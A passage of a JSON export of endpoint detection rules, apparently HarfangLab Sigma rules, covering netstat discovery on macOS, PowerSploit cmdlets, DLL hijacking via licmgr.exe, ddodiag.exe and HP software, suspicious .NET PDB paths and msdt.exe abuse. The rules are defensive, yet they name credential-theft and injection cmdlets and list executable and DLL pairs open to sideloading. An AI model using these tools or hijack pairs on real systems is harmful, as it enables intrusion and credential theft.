/System/Library/Frameworks/SystemConfiguration.framework/Versions/*Resources/get-network-info*'\n\n exclusion_grandparent:\n GrandparentImage:\n - '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n - '/Applications/rekordbox*/rekordbox.app/Contents/MacOS/rekordbox'\n - '/usr/local/bin/node'\n - '/Users/*/.nvm/versions/node/v*/bin/node'\n - '/Users/*/.asdf/installs/nodejs/*/bin/node'\n - '/Users/*/.local/share/fnm/node-versions/v*/installation/bin/node'\n - '/Applications/DDPM/DDPM.app/Contents/MacOS/DDPM'\n - '/usr/libexec/sysdiagnosed'\n - '/Library/SystemExtensions/*/com.netskope.client.Netskope-Client.NetskopeClientMacAppProxy.systemextension/Contents/MacOS/com.netskope.client.Netskope-Client.NetskopeClientMacAppProxy'\n\n exclusion_periodic_status_network:\n ParentCommandLine: '/bin/sh /etc/periodic/daily/420.status-network'\n CommandLine: 'netstat -i'\n\n exclusion_wazuh:\n Ancestors|contains:\n - '/Library/Ossec/bin/wazuh-syscheckd'\n - '|/Library/Ossec/bin/wazuh-logcollector'\n\n exclusion_ocsinventory:\n ParentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n\n exclusion_meraki:\n - GrandparentImage: '/Library/Application Support/Meraki/m_agent'\n # /bin/sh -c netstat -ib | grep -e \"en0\" -m 1 | awk '{print $7\" \"$10}'\n - ParentCommandLine: \"/bin/sh -c netstat -ib | grep -e \\\"en?\\\" -m 1 | awk '{print $7\\\" \\\"$10}'\"\n\n # As the parents are missing we don't know which process is doing this actions, but generate a lot of noise\n exclusion_unknown:\n ParentCommandLine:\n - \"sh -c /usr/sbin/netstat -rn -f inet | /usr/bin/egrep -e '^[0-9]+.*|^[a-f]+.*|^[A-F]+.*|^default'\"\n - \"sh -c /usr/sbin/netstat -rn -f inet? | /usr/bin/egrep -e '^[0-9]+.*|^[a-f]+.*|^[A-F]+.*|^default'\"\n - 'sh -c netstat -anv | grep [.]54???'\n - \"/bin/sh -c netstat -rn | grep UG | awk '{print $NF}'\"\n\n exclusion_glpi:\n - ParentImage: '/Applications/GLPI-Agent/bin/perl'\n - GrandparentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_delovo:\n - ParentImage: '/opt/devolo/bin/devolonetsvc'\n - GrandparentImage: '/opt/devolo/bin/devolonetsvc'\n\n exclusion_fusion_inventory:\n - ParentImage: '/opt/fusioninventory-agent/bin/perl'\n - GrandparentImage: '/opt/fusioninventory-agent/bin/perl'\n\n exclusion_fsecure:\n - GrandparentCommandLine: '/bin/bash /usr/local/f-secure/bin/orspwrapper.sh --daas2-data ./orspclient/etc --http-port 0'\n - CommandLine: 'netstat -nr'\n CurrentDirectory: '/usr/local/f-secure'\n\n exclusion_tanium:\n Ancestors|contains: '|/Library/Tanium/TaniumClient/TaniumClient'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d99b108-5ade-42df-b9d6-c4b94dea6e12",
"rule_name": "Network Statistics Discovered via Netstat (macOS)",
"rule_description": "Detects the execution of the netstat command.\nAttackers may use it during the discovery phase of an attack to retrieve network connection statistics and gather information on currently active connections.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d9c3390-1a0c-4b77-a811-5d2057a4e979",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608065Z",
"creation_date": "2026-03-23T11:45:34.608068Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608075Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/PowerShellMafia/PowerSploit",
"https://attack.mitre.org/techniques/T1059/001/",
"https://attack.mitre.org/software/S0194/"
],
"name": "t1059_001_powershell_malicious_cmdlet_powersploit_script.yml",
"content": "title: Malicious PowerSploit Commandlets\nid: 3d9c3390-1a0c-4b77-a811-5d2057a4e979\ndescription: |\n Detects various malicious commandlets in PowerShell scripts, generally associated with the Powersploit framework.\n PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\n It is recommended to investigate the script contents to determine if the function call was part of the malicious framework or a legitimate script and if it stems from legitimate activity.\nreferences:\n - https://github.com/PowerShellMafia/PowerSploit\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/software/S0194/\ndate: 2021/06/22\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1134\n - attack.collection\n - attack.t1123\n - attack.credential_access\n - attack.t1056.001\n - attack.t1558.003\n - attack.execution\n - attack.t1047\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.005\n - attack.s0194\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerSploit\n - classification.Windows.Framework.PowerView\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains:\n - 'Set-MacAttribute'\n - 'Invoke-DllInjection'\n - 'Invoke-Shellcode'\n - 'Invoke-WmiCommand'\n - 'Get-GPPPassword'\n - 'Get-Keystrokes'\n - 'Get-TimedScreenshot'\n - 'Get-VaultCredential'\n - 'Invoke-CredentialInjection'\n - 'Invoke-Mimikatz'\n - 'Invoke-NinjaCopy'\n - 'Invoke-TokenManipulation'\n - 'Out-Minidump'\n - 'Invoke-ReflectivePEInjection'\n - 'Invoke-DowngradeAccount'\n - 'Add-RegBackdoor'\n - 'Install-SSP'\n - 'PowerBreach'\n - 'Get-SiteListPassword'\n - 'Invoke-WScriptBypassUAC'\n - 'PowerUp'\n - 'Get-ServiceUnquoted'\n - 'Get-ServiceFilePermission'\n - 'Get-ServicePermission'\n - 'Invoke-ServiceAbuse'\n - 'Install-ServiceBinary'\n - 'Find-DLLHijack'\n - 'Find-PathHijack'\n - 'Get-RegAlwaysInstallElevated'\n - 'Get-RegAutoLogon'\n - 'Get-VulnAutoRun'\n - 'Get-VulnSchTask'\n - 'PowerView'\n - 'Invoke-PortScan'\n - 'Invoke-ReverseDNSLookup'\n - 'Invoke-AllChecks'\n - 'Get-MicrophoneAudio'\n - 'Invoke-Kerberoast'\n\n # if ($SOFTWARENAME -match \"ShinoBOT\" -or $URL -match \"ShinoBOT\") {\n # try { '' | out-file ':::::\\windows\\sentinel\\3' -Confirm:$false -WhatIf:$false } catch {}\n # }\n # $local:counter = 0\n # foreach ($item in $($REGISTRYNAMEHOSTID, $REGISTRYNAMEPASSWORD, $IDDELIMITER, $COMMANDSDELIMITER, $HostID, $dojob)) {\n # if ($item -ne $null) { $counter += 1 }\n # };\n # if ($counter -ge 4) {\n # try { '' | out-file ':::::\\windows\\sentinel\\3' -Confirm:$false -WhatIf:$false } catch {}\n # }\n # while ($PreviousErrCount -ne $error.count) {\n # $error.remove($error[0])\n # }\n # Remove-Variable PreviousErrCount -Scope local -Confirm:$false -WhatIf:$false}} | Out-Null\n # Set-PSBreakpoint -Variable 'IDDELIMITER' -Mode write -Action { <#sentinelbreakpoints#> . {\n exclusion_sentinel_one:\n PowershellCommand|contains|all:\n - ':::::\\windows\\sentinel'\n - '<#sentinelbreakpoints#>'\n\n exclusion_techpowerup:\n PowershellCommand|contains: 'TechPowerUp.'\n\n # https://www.powershellgallery.com/packages/Carbon/2.9.2/Content/Carbon.psm1\n exclusion_carbon:\n PowershellCommand|contains: 'Set-Alias -Name ?Get-ServicePermissions? -Value ?Get-CServicePermission?'\n\n exclusion_amazon:\n PowershellCommand: 'function Invoke-WmiCommand('\n PowershellScriptPath: '?:\\Program Files\\Amazon\\AWS DMS Collector\\PowerShell\\\\*.psm1'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d9c3390-1a0c-4b77-a811-5d2057a4e979",
"rule_name": "Malicious PowerSploit Commandlets",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Powersploit framework.\nPowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.\nIt is recommended to investigate the script contents to determine if the function call was part of the malicious framework or a legitimate script and if it stems from legitimate activity.\n",
"rule_creation_date": "2021-06-22",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1056.001",
"attack.t1059.001",
"attack.t1123",
"attack.t1134",
"attack.t1547.005",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e1415cf-9a1e-48bf-9548-0d6d2af5a98f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095998Z",
"creation_date": "2026-03-23T11:45:34.096000Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096004Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licmgr.yml",
"content": "title: DLL Hijacking via licmgr.exe\nid: 3e1415cf-9a1e-48bf-9548-0d6d2af5a98f\ndescription: |\n Detects potential Windows DLL Hijacking via licmgr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licmgr.exe'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\lrwizdll.dll'\n - '\\ntdsapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e1415cf-9a1e-48bf-9548-0d6d2af5a98f",
"rule_name": "DLL Hijacking via licmgr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via licmgr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e31fb72-ee20-4a45-96c7-b801ee49e65f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076559Z",
"creation_date": "2026-03-23T11:45:34.076561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076565Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1620/"
],
"name": "t1620_dotnet_assembly_load_susp_pdb.yml",
"content": "title: Dotnet Assembly with Suspicious PDB Path Loaded\nid: 3e31fb72-ee20-4a45-96c7-b801ee49e65f\ndescription: |\n Detects the loading of .NET assemblies whose PDB path indicates potentially malicious activities.\n Program Database (PDB) files contain debugging information and file paths that can reveal the original development environment and intent of .NET assemblies.\n Suspicious PDB paths may include references to offensive tools, exploit frameworks, or development environments associated with malicious activities.\n It is recommended to analyze the loading process and to investigate the assembly's functionality and origin.\nreferences:\n - https://attack.mitre.org/techniques/T1620/\ndate: 2024/11/27\nmodified: 2025/06/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1620\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n AssemblyFlags: '0x0'\n AssemblyToken: 'null'\n FullyQualifiedAssemblyName|contains:\n - 'Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'\n - 'Version=0.0.0.0, Culture=neutral, PublicKeyToken=null'\n ManagedPdbBuildPath|contains:\n - 'maldev'\n - 'malware'\n - 'backdoor'\n - 'keylog'\n - 'shellcode'\n - 'PrivilegeEscalation'\n - 'CVE_20'\n - 'CVE-20'\n - 'exploit'\n - 'RedTeam'\n - 'hack'\n - 'Attack'\n - 'UACbypass'\n - 'loader'\n - 'webshell'\n - 'Dropper'\n - 'grabber'\n - 'Inject'\n - 'Payload'\n - 'trojan'\n - 'ByPass'\n - 'spreader'\n - ' ' # multiple spaces\n\n # Avoid false positive with loader word used in the detection\n filter_known_word:\n # loader\n ManagedPdbBuildPath: 'uploader'\n\n filter_known_assembly:\n AssemblyName: 'easily.exploitation.sql'\n\n filter_path:\n ModuleILPath|contains: '\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e31fb72-ee20-4a45-96c7-b801ee49e65f",
"rule_name": "Dotnet Assembly with Suspicious PDB Path Loaded",
"rule_description": "Detects the loading of .NET assemblies whose PDB path indicates potentially malicious activities.\nProgram Database (PDB) files contain debugging information and file paths that can reveal the original development environment and intent of .NET assemblies.\nSuspicious PDB paths may include references to offensive tools, exploit frameworks, or development environments associated with malicious activities.\nIt is recommended to analyze the loading process and to investigate the assembly's functionality and origin.\n",
"rule_creation_date": "2024-11-27",
"rule_modified_date": "2025-06-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1620"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e456468-0899-4a47-967e-a1e508005da6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072530Z",
"creation_date": "2026-03-23T11:45:34.072533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072537Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/software/S0154/"
],
"name": "t1055_suspicious_process_msdt.yml",
"content": "title: Suspicious msdt.exe Execution\nid: 3e456468-0899-4a47-967e-a1e508005da6\ndescription: |\n Detects suspicious execution patterns of msdt.exe (Microsoft Support Diagnostic Tool), a legitimate Windows troubleshooting utility.\n While normally used for system diagnostics, this binary is frequently abused by attackers, particularly Cobalt Strike, through its spawnto technique to masquerade malicious activities as legitimate troubleshooting processes.\n It is recommended to analyze any associated diagnostic packages, and terminate unauthorized instances while correlating with other Cobalt Strike indicators.\nreferences:\n - https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/04\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\msdt.exe'\n - OriginalFileName: 'msdt.exe'\n\n exclusion_legitimate_commandline:\n CommandLine|contains:\n - ' -path'\n - ' /path'\n - ' -id'\n - ' /id'\n - ' -cab'\n - ' /cab'\n - ' -dt'\n - ' /dt'\n - ' -\\?'\n - ' /\\?'\n - ' ms-msdt:-id'\n\n exclusion_known_fp_1:\n CommandLine: '?:\\Windows\\System32\\msdt.exe -sp Microsoft -elevated yes'\n ParentImage: '?:\\Windows\\System32\\msdt.exe'\n\n exclusion_known_fp_2:\n CommandLine:\n - '?:\\Windows\\System32\\msdt.exe'\n - '?:\\Windows\\SysWOW64\\msdt.exe'\n ParentImage:\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\explorer.exe'\n - '?:\\Program Files (x86)\\Common Files\\VAudio\\Interop.exe'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/fix-problems-in-windows-search\n exclusion_known_fp_3:\n CommandLine:\n - 'msdt.exe -ep WindowsHelp id SearchDiagnostic'\n - '?:\\Windows\\system32\\msdt.exe -ep WindowsHelp id SearchDiagnostic'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e456468-0899-4a47-967e-a1e508005da6",
"rule_name": "Suspicious msdt.exe Execution",
"rule_description": "Detects suspicious execution patterns of msdt.exe (Microsoft Support Diagnostic Tool), a legitimate Windows troubleshooting utility.\nWhile normally used for system diagnostics, this binary is frequently abused by attackers, particularly Cobalt Strike, through its spawnto technique to masquerade malicious activities as legitimate troubleshooting processes.\nIt is recommended to analyze any associated diagnostic packages, and terminate unauthorized instances while correlating with other Cobalt Strike indicators.\n",
"rule_creation_date": "2022-01-04",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3e6d1273-89a6-489b-8d39-0d72e284df91",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593808Z",
"creation_date": "2026-03-23T11:45:34.593811Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593819Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ddodiag.yml",
"content": "title: DLL Hijacking via ddodiag.exe\nid: 3e6d1273-89a6-489b-8d39-0d72e284df91\ndescription: |\n Detects potential Windows DLL Hijacking via ddodiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ddodiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fddevquery.dll'\n - '\\propsys.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3e6d1273-89a6-489b-8d39-0d72e284df91",
"rule_name": "DLL Hijacking via ddodiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ddodiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3eb7a11a-6332-420e-b874-a943ded0d729",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590248Z",
"creation_date": "2026-03-23T11:45:34.590252Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590260Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims",
"https://github.com/FalconForceTeam/FalconFriday/blob/master/Uncategorized/FireEye_red_team_tool_countermeasures.md#hpcustpartuidll-hijack",
"https://www.contextis.com/en/blog/dll-search-order-hijacking",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hp_colorlaser_jet.yml",
"content": "title: DLL Hijacking via HP ColorLaser Jet software\nid: 3eb7a11a-6332-420e-b874-a943ded0d729\ndescription: |\n Detects potential Windows DLL Hijacking via HP ColorLaser Jet software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims\n - https://github.com/FalconForceTeam/FalconFriday/blob/master/Uncategorized/FireEye_red_team_tool_countermeasures.md#hpcustpartuidll-hijack\n - https://www.contextis.com/en/blog/dll-search-order-hijacking\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'HPCustParticUI.exe'\n ProcessSignature: 'Hewlett Packard'\n ImageLoaded|endswith: '\\HPCustPartUI.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\HP\\HP*\\Bin\\'\n - '?:\\Program Files (x86)\\HP\\HP*\\Bin\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\HP\\HP*\\'\n - '?:\\Program Files (x86)\\HP\\HP*\\'\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Hewlett Packard'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3eb7a11a-6332-420e-b874-a943ded0d729",
"rule_name": "DLL Hijacking via HP ColorLaser Jet software",
